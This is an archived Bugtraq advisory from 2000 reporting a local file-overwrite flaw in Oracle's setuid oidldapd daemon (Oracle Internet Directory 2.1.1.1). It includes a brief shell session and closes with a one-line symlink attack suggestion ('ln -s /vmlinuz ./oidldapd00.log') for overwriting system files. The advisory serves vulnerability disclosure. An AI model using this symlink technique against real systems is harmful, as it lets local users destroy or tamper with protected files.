Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

vulnerability #2 in Oracle Internet Directory 2.1.1.1 in Oracle 8.1.7

From: Juan Manuel Pascual Escriba <pask () PLAZASITE COM>
Date: Fri, 22 Dec 2000 10:38:20 +0100








                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in oidldapd in Oracle 8.1.7
    Date:     11-12-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user compromise any file in local machine.
  Author:     Juan Manuel Pascual (pask () plazasite com)
  Status:     Vendor Contacted answers received. Details Below

OVERVIEW:
    oidldapd is a Oracle Internet Directory. Oracle Ldap Daemon. The
actual version is 2.1.1.1

PROBLEM SUMMARY:
    There is a write permision checking error in oidldapd that can be
used by local
users to write any file in local machine.

IMPACT:
    Any user with local access, can write any file.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted .

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escribá        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask () plazasite com
        -------------------------------------------------------------


























This Feature seems to be new with oidldapd in OID 2.1.1.1/8.1.7 i couldnt
reproduce with oidldapd in OID 2.0.6.3 and seems to be very dangerous. Look at
this. In my system occurs the next:

my ORACLE_HOME=/work/oracle8ir3

oracle@dimoniet bin]$ cd /work/oracle8ir3/ldaplog
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx    2    oracle    orainstall    4096    Dec    12    05:03 .
drwxr-xrwx   13    oracle   orainstall    4096    Dec    10    18:50 ..

Ok .. nothing in logs ... lets go to execute oidldapd.

oracle@dimoniet log]$ /work/oracle8ir3/bin/oidldapd
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx    2    oracle   orainstall    4096    Dec    12    05:03 .
drwxr-xrwx   13   oracle   orainstall    4096    Dec    10    18:50 ..
-rw-r--r--      1       root    orainstall        86   Dec     12    05:26
oidldapd00.log


Ups ... owned by root ? ... no comment about .. what about ln -s /vmlinuz ./oidldapd00.log ? or shared libraries ?
Previous By Date Next
Previous By Thread Next

Current thread: